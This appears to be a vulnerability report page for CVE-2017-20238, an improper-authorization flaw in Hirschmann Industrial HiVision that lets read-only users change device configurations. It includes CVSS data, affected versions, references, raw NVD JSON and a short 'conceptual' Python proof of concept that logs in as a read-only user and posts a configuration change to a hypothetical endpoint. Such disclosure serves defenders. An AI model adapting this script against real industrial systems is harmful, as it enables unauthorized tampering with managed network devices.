Security Vulnerability Report
CVE-2017-20238 CVSS 7.1 HIGH

Published: 2026-04-03 23:17:01
Last Modified: 2026-04-07 13:20:55

Description

Hirschmann Industrial HiVision versions 06.0.00 and 07.0.00 prior to 06.0.06 and 07.0.01 contain an improper authorization vulnerability that allows read-only users to gain write access to managed devices by bypassing access control mechanisms. Attackers can exploit alternative interfaces such as the web interface or SNMP browser to modify device configurations despite having restricted permissions.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Hirschmann Industrial HiVision 06.0.00 - 06.0.05
Hirschmann Industrial HiVision 07.0.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Conceptual PoC for CVE-2017-20238
# This script demonstrates how a read-only user might trigger a configuration change.

TARGET_URL = "https://<target-ip>/api/config"  # Hypothetical endpoint
USERNAME = "readonly_user"
PASSWORD = "readonly_pass"

session = requests.Session()

# Step 1: Authenticate as a low-privilege user
login_payload = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/login", json=login_payload, verify=False)

if login_response.status_code == 200:
    print("[+] Login successful as read-only user.")

    # Step 2: Attempt to modify configuration (Privilege Escalation)
    # Exploiting the improper authorization on the write interface
    config_payload = {
        "setting": "critical_config",
        "value": "malicious_value"
    }
    exploit_response = session.post(f"{TARGET_URL}/update", json=config_payload, verify=False)

    if exploit_response.status_code == 200:
        print("[+] Configuration modified successfully! Vulnerability confirmed.")
    else:
        print("[-] Failed to modify configuration.")
else:
    print("[-] Login failed.")

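References

https://assets.belden.com/m/7cc5d59343125b25/original/Security-Bulletin-Restricted-User-Roles-Write-Access-HiVision-2017-01.pdf
https://www.vulncheck.com/advisories/hirschmann-industrial-hivision-improper-authorization-privilege-escalation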

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20238", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:00.633", "lastModified": "2026-04-07T13:20:55.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hirschmann Industrial HiVision versions 06.0.00 and 07.0.00 prior to 06.0.06 and 07.0.01 contains an improper authorization vulnerability that allows read-only users to gain write access to managed devices by bypassing access control mechanisms. Attackers can exploit alternative interfaces such as the web interface or SNMP browser to modify device configurations despite having restricted permissions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://assets.belden.com/m/7cc5d59343125b25/original/Security-Bulletin-Restricted-User-Roles-Write-Access-HiVision-2017-01.pdf", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hirschmann-industrial-hivision-improper-authorization-privilege-escalation", "source": "[email protected]"}]}}